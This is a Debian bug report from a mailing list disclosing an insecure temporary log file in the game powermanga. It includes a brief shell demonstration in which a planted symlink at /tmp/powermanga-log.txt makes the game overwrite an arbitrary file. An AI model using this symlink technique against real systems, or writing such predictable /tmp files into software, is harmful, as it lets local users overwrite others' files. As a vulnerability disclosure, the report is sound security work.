Bug#764144: powermanga: Insecure temporary file /tmp/powermanga-log.txt
Josh Triplett
josh at joshtriplett.org
Sun Oct 5 19:03:10 UTC 2014
Package: powermanga
Version: 0.93-1
Severity: grave
Tags: security
~$ ln -s ~/arbitrary-file /tmp/powermanga-log.txt
~$ ls -l /tmp/powermanga-log.txt
lrwxrwxrwx 1 josh josh 25 Oct 4 21:14 /tmp/powermanga-log.txt -> /home/josh/arbitrary-file
~$ powermanga
(II) configuration filename: /home/josh/.config/tlk-games/powermanga.conf [config_file.c:231, configfile_load]
~$ ls -l /tmp/powermanga-log.txt ~/arbitrary-file
-rw-r--r-- 1 josh games 154 Oct 4 21:15 /home/josh/arbitrary-file
lrwxrwxrwx 1 josh josh 25 Oct 4 21:14 /tmp/powermanga-log.txt -> /home/josh/arbitrary-file
~$ cat arbitrary-file
2014-10-04 21:14:55 (II) [File: config_file.c][Line: 231][Function: configfile_load] configuration filename: /home/josh/.config/tlk-games/powermanga.conf
This appears to allow overwriting an arbitrary file writable by either
the user or group games.
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 3.16-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages powermanga depends on:
ii libc6 2.19-11
ii libpng12-0 1.2.50-2
ii libsdl-mixer1.2 1.2.12-11+b1
ii libsdl1.2debian 1.2.15-10
ii powermanga-data 0.93-1
powermanga recommends no packages.
powermanga suggests no packages.
-- no debconf information
More information about the Pkg-games-devel
mailing list